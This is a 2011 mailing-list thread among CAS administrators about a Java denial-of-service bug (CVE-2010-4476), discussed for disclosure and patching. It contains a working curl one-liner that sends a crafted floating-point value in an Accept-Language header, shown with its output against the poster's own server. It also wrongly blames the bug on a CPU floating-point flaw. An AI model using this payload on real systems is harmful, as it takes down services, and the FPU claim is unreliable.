As noted in a new thread, CAS steering committee is responding to this
serious issue with this notification post:
http://www.jasig.org/cas/news/cve-2010-4476
Best wishes,
Andrew
On 02/09/2011 09:29 AM, Marti, Robert wrote:
Correction... throwing 60 of those curls at my one server (rhel5 64bit, 4gb of
ram, no java tuning) causes it to crawl. It should be pretty easy to drop
these at the load balancer/firewall tho, so at least we have a workaround.
Rob Marti
-----Original Message-----
From: Marti, Robert [mailto:[email protected]]
Sent: Wednesday, February 09, 2011 8:12 AM
To: [email protected]
Subject: RE: [cas-user] Important! Critical bug in all Java versions
-> curl -vH "Accept-Language: en-us;q=2.2250738585072012e-308"
-> http://lnxauth02d.shsu.edu:8080/sghe-cas/login
* About to connect() to lnxauth02d.shsu.edu port 8080
* Trying 158.135.5.21... connected
* Connected to lnxauth02d.shsu.edu (158.135.5.21) port 8080
GET /sghe-cas/login HTTP/1.1
User-Agent: curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
Host: lnxauth02d.shsu.edu:8080
Accept: */*
Accept-Language: en-us;q=2.2250738585072012e-308
It just hangs that curl until I ctrl-C - the JVM still works fine (I can log in
to the
box without any problems) using 1.6.0_22.
Rob Marti
-----Original Message-----
From: Robert Oschwald [mailto:[email protected]]
Sent: Wednesday, February 09, 2011 7:45 AM
To: [email protected]
Cc: [email protected]
Subject: [cas-user] Important! Critical bug in all Java versions
This is off topic but important to all CAS users.
There exists a remotely exploitable critical bug in Java which can
lead to a complete crash of the JVM.
Every admin is urged to immediately patch all Sun/Bea/Oracle Java
Versions on their servers.
Main cause of the problem is a flaw in the AMD/Intel floating point unit.
JVM Patcher:
https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-
Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=fpupdater-oth-
JPR@CDS-CDS_Developer
As noted above, every script kiddie can crash your remotely available
java app by simply sending the magic string in the HTTP-HEADER (e.g.
by using curl).
Hope it helps.
Robert
--
You are currently subscribed to [email protected] as:
[email protected] To unsubscribe, change settings or access archives, see
http://www.ja- sig.org/wiki/display/JSG/cas-user
--
You are currently subscribed to [email protected] as: [email protected] To
unsubscribe, change settings or access archives, see http://www.ja-
sig.org/wiki/display/JSG/cas-user
--
You are currently subscribed to [email protected] as:
[email protected]
To unsubscribe, change settings or access archives, see
http://www.ja-sig.org/wiki/display/JSG/cas-user
